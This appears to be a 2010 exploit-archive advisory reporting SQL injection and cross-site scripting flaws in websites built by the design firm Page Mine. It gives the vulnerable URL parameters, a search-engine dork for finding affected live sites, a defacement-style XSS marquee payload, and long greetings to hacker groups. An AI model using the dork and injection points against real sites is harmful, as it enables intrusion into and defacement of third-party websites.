Page Mine XSS/SQL Injection Vulnerability

2010-12-06
ID: 15044
CVE: None
Download vulnerable application: None
# Vendor        : http://www.pagemine.com/clients.php
# prices        : Not Yet:P
# Discovered by : cyberlog
# Site          : Sekuritionline.net
# Channel       : #SekuritiOnline  & #Bajingan [ Now Just My Bot ]
 # Dork          : "Web Design by Page Mine" inurl:"photo.php?photo="
 # Exploit       : [site]/photo.php?photo= [SQL Injection]
                  [site]/painting.php?productid= [SQL Injection] [ XSS ]
                            # Thanks        : GOD,r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz,
jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiLL,blindboy,sukam,pencopet_cinta, pomponk,
SarifJedul,wiro_gendenk,Letjen,ridho_bugs,Ryan_Kabrutz,aurel666,Inof,dbanie, GuA_NinOx, [email protected], marlon_inside
 # special to Mama Sri Rahayu, Member& Staff Sekuritonline,Inj3ct0r, H4ckb0x,JatimCr3w,ManadoCoding, Bajingan Crew,
# C0li a.k.a antisecurity [ pinjem script perl-na ] 
# Hiroyuki Doni thanks to create New design SO T-shirt P
# Inj3ct0r Now Brothers with Sekuritionline
# Inj3ct0r.com moved to 1337day.com
  ####################################################
 # Demo offline:
# http://localhost/photo.php?photo= [SQL Injection]
# http://localhost/painting.php?productid=<marquee><font color=red size=15>cyberlog isn't hacker :P</font></marquee>
  ####################################################
1-4-2 (www01)